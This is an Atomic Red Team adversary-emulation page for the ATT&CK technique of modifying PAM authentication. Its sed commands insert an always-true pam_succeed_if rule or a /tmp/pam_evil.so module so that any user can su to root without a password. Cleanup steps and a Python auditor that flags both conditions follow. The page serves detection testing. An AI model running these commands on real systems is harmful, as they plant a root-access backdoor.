T1556.003 - Modify Authentication Process: Pluggable Authentication Modules

Description from ATT&CK

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary-supplied values as legitimate credentials.(Citation: PAM Backdoor) Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain text (PAM does not store passwords).(Citation: PAM Creds)(Citation: Apple PAM)

Atomic Tests


Atomic Test #1 - Malicious PAM rule

Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.

Supported Platforms: Linux

auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0 |
| index | Index where the rule is inserted. | integer | 1 |

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

```sh
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```

Cleanup Commands:

```sh
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
```



Atomic Test #2 - Malicious PAM rule (freebsd)

Inserts a rule into a PAM config and then tests it.

Upon successful execution, this test will insert a rule that allows every user to su to root without a password.

Supported Platforms: Linux

auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0 |
| index | Index where the rule is inserted. | integer | 8 |

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

```sh
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```

Cleanup Commands:

```sh
sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
```



Atomic Test #3 - Malicious PAM module

Creates a PAM module, inserts a rule to use it, and then tests it.

Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.

Supported Platforms: Linux

auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so |
| index | Index where the rule is inserted. | integer | 1 |
| path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c |
| path_to_pam_module | Path to PAM module object. | path | /tmp/pam_evil.so |

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

```sh
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```

Cleanup Commands:

```sh
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
```

Dependencies: Run with sh!

Description: The PAM development library must be installed to build the PAM module.

Check Prereq Commands:

```sh
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
```

Get Prereq Commands:

```sh
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
```

Description: The PAM module must exist on disk at the specified location (#{path_to_pam_module}).

Check Prereq Commands:

```sh
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
```

Get Prereq Commands:

```sh
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
```
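Added example, not part of Atomic Red Team or the tests above: a small auditor that parses /etc/pam.d-style files and flags the two conditions Tests #1 to #3 create, an `auth` rule whose control ends the stack on success (`sufficient`, i.e. `[success=done ...]`) with an always-true `pam_succeed_if` condition such as `uid >= 0`, and an `auth` module loaded by absolute path from outside the packaged module directories (such as `/tmp/pam_evil.so`). The trusted directory set and the sample `su-l` file are assumptions constructed for the example.

```python
import os
import re

# Directories from which packaged PAM modules are normally loaded (assumption:
# extend this set for your distribution's layout).
TRUSTED_MODULE_DIRS = {"/lib/security", "/lib64/security", "/usr/lib/security",
                       "/usr/lib64/security", "/lib/x86_64-linux-gnu/security"}
SUCCEED_IF_FLAGS = {"debug", "use_uid", "quiet", "quiet_fail", "quiet_success", "audit"}
# type, control (plain word or bracketed [value=action ...] form), module, args
LINE_RE = re.compile(r"^-?(\S+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")

def parse_pam_line(line):
    """Split one /etc/pam.d-style line into (type, control, module, args);
    returns None for blank, comment or malformed lines."""
    m = LINE_RE.match(line.split("#", 1)[0].strip())
    return (m[1].lower(), m[2], m[3], m[4].split()) if m else None

def always_true_succeed_if(args):
    """True if every pam_succeed_if condition holds for any account, e.g. 'uid >= 0'."""
    conds = [a for a in args if a not in SUCCEED_IF_FLAGS]
    triples = list(zip(conds[::3], conds[1::3], conds[2::3]))
    return bool(triples) and len(conds) % 3 == 0 and all(
        f in ("uid", "gid") and v.lstrip("-").isdigit()
        and (o == ">=" and int(v) <= 0 or o == ">" and int(v) < 0)
        for f, o, v in triples)

def audit_pam_config(text):
    """Return [(line_number, reason)] for auth rules that let any user through."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_pam_line(raw)
        if parsed is None or parsed[0] != "auth":
            continue
        _, control, module, args = parsed
        # 'sufficient' is shorthand for [success=done ...]: success ends the stack early
        ends_stack = control == "sufficient" or "success=done" in control
        if ends_stack and os.path.basename(module) == "pam_succeed_if.so" \
                and always_true_succeed_if(args):
            findings.append((lineno, "always-true pam_succeed_if ends the auth stack with success"))
        if module.startswith("/") and os.path.dirname(module) not in TRUSTED_MODULE_DIRS:
            findings.append((lineno, f"module loaded from untrusted path {module}"))
    return findings

# Constructed sample: /etc/pam.d/su-l after Atomic Tests #1 and #3 inserted their rules.
SAMPLE_SU_L = """\
auth sufficient pam_succeed_if.so uid >= 0
auth sufficient /tmp/pam_evil.so
auth [success=1 default=ignore] pam_succeed_if.so uid >= 1000 quiet
auth required /lib/security/pam_unix.so
"""
```

Running `audit_pam_config(SAMPLE_SU_L)` reports lines 1 and 2 only; the bracketed `uid >= 1000` skip rule and the packaged `pam_unix.so` are left alone.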